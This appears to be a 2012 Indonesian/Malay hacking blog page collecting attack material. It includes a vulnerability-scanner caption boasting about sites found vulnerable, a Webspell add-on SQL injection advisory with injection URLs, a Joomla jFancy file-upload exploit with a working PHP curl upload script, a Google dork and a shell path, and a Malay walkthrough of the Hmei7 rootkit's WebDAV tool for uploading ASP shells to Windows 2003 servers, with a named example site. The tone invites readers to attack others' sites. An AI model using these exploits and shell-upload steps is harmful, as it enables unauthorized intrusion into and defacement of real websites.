[Image: previewToolsDiamondhackVuln.jpg]

1. ( Gbr di sebelah Kiri ) Tool sedang Searching
2. ( Gbr di Sebelah kanan ) Hasil'y : URL website yang vulnerability ada 4 ekor yg siap di Perkosa, So karena ane STOP pencarian'y. Si Tool ini langsung ngasih laporan'y/Hasil'y.



Download Here :
Dimana ya

Monday, 11 June 2012

Webspell 4.2.x dailyinput Movie-Addon SQL Injection Vulnerability

========================================================================================
| # Title    : Webspell 4.2.x dailyinput Movie-Addon SQL Injection Vulnerability
| # Author   : Easy Laster
| # Script   : Webspell 4.2.x dailyinput Movie-Addon
| # Site     : www.kode-designs.com
| # Download : www.setgaming.de/index.php?site=files&file=26
| # Demo     : www.setgaming.de/index.php?site=videos
| # Price    : free
| # Exploitation : Remote SQL Vulnerability
| # Bug      : Remote SQL Vulnerability
| # Date     : 08.06.2012
| # Language : PHP
| # Status   : vulnerable
| # Greetings: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, ezah, Manifest
======================        Proof of Concept         =================================
   
   
  [+] Introduction
     
   dailyinput Movie-Addon is a Addon for the Webspell Web Application the Content Management
   System. In this Addon we found a Remote SQL Injection vulnerability.The Movie file
   is Vulnerable and a high risk Bug.The Vulnerability is Not fixed from the coder.The most 
   Webspell Webapplication has a Security System in the Webspell core self.You must bypass
   the core from Webspell Security System (globalskiller).
    
   
  [+] Vulnerability
   
    http://[host]/[path]/index.php?site=videos&action=detail&id=2&portal=[vul]
   
  [+] Exploit
     
    http://[host]/[path]/index.php?site=videos&action=detail&id=2&portal=1+order+by+5--+
    http://[host]/[path]/index.php?site=videos&action=detail&id=2&portal=1+order+by+4--+
   
  [+] Fix
   
    No fix.


# 1337day.com [2012-06-10]

Joomla Modules - jFancy Arbitrary File Upload Vulnerability

##################################################
# Description : Joomla Modules - jFancy  Arbitrary File Upload Vulnerability
# Version : 2.02
# Link : http://www.joomlaproduction.com/index.php/Modules/jFancy/flypage.tpl.html
# Plugins : register for download
# Google Dork : inurl:/modules/mod_jfancy/
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################


Exploit :

PostShell.php
<?php

$uploadfile="lo.php.gif";
$ch = curl_init("http://www.exemple.com/modules/mod_jfancy/script.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
       array('photoupload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access : http://www.exemple.com/images/lo.php.gif

lo.php.gif
<?php
phpinfo();
?>


# 1337day.com [2012-06-09]

Webdav [Rootkit Hmei7]

Halo Semuanya Kembali lagi bersama Viscount

Kali
ini
Saya
Akan
Memberitahu

  anda cara untuk menggunakan
Webdav Yg Ada Dalam
Rootkit  Diperbuat Oleh Hmei7


Preview:




untuk pengetahuan anda
Webdav ini menggunakan
exploit Webfolder
Webfolder ni Hanya terdapat Pada
Server Windows 2003
pandai2 la korg bikin Dork sendiri ye ^^
kalau ada Dork Yg Bagus Share2 La Ye Kt Bwh ni...

Mari Kita Lakukannya!

Pertama Sekali

Download
Disini
Password:cbf


Selepas Itu
Buka Rootkit.exe
yg berada di dalam Rar tersebut

Kemudian cari Webdav di Tab yang berada di atas
dan pilih  asp shell maker



Kemudian Tekan Add Site
Dan Masukkan 1 site

Contoh Target


Lepas Letak Site.Tekan OK




Skrg ni.Tekan Setting
Korg akan nampak Name Of  Your Shell
/Hmei7.asp;.txt

korg buang Hmei7 dan gantikan dgn nama yg korg nk
kt pic bwh ni afnum da tukar nama shell tu kepada
/afnum.asp;.txt




Kalau Korg x nk upload shell kt site tu
korg tukarkan format nya
Contoh:
nama Asal
/Hmei7.asp;.txt
format yang anda hendak tukar
/abc.txt or /abc.html or /ETC


dan buang semua code yang berada di bawah
Write Your Shell Here
Kepada Coding korg :)



Kemudian Tekan Serang !!!


Dan Akan Muncul seperti Gambar di bawah



Jika Ianya Dapat Upload File Anda Ke Dalam server tersebut akan muncul perkataan seperti di bawah
shell created !!
http://www.hrbswx.com/afnum.txt




Dan Selesai ^^
Made by Viscount